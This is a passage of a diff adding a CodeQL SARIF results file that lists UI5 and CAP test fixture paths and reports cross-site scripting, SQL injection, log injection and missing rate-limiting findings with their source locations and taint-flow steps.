"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 334 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 335 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 336 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 337 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 338 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 339 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 340 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 341 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 342 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 344 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 345 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 346 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 347 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 349 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 350 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 351 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 353 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 354 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 356 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 357 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 358 + } + }, { + 
"location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 359 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", + "uriBaseId" : "%SRCROOT%", + "index" : 360 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 361 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 362 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 363 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 364 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 365 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 366 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 367 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 368 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 369 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", + 
"uriBaseId" : "%SRCROOT%", + "index" : 370 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 371 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + 
"uriBaseId" : "%SRCROOT%", + "index" : 382 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + }, { + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + }, { + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + }, { + "location" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + }, { + "location" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } ], + "results" : [ { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6311a9ed7e4091a4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... 
param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + 
"index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c51cf11a085c01f4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + 
"message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e309bf8540256a05:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... 
(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/missing-rate-limiting", + "rule" : { + "id" : "js/missing-rate-limiting", + "index" : 68, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This route handler performs [a database access](1), but is not rate-limited." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 40, + "startColumn" : 25, + "endLine" : 44, + "endColumn" : 8 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", + "primaryLocationStartColumnFingerprint" : "18" + }, + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 9, + "endLine" : 43, + "endColumn" : 11 + } + }, + "message" : { + "text" : "a database access" + } + } ] + }, { + "ruleId" : "js/sql-injection", + "rule" : { + "id" : "js/sql-injection", + "index" : 78, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This query string depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4fc3122b51f477a1:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
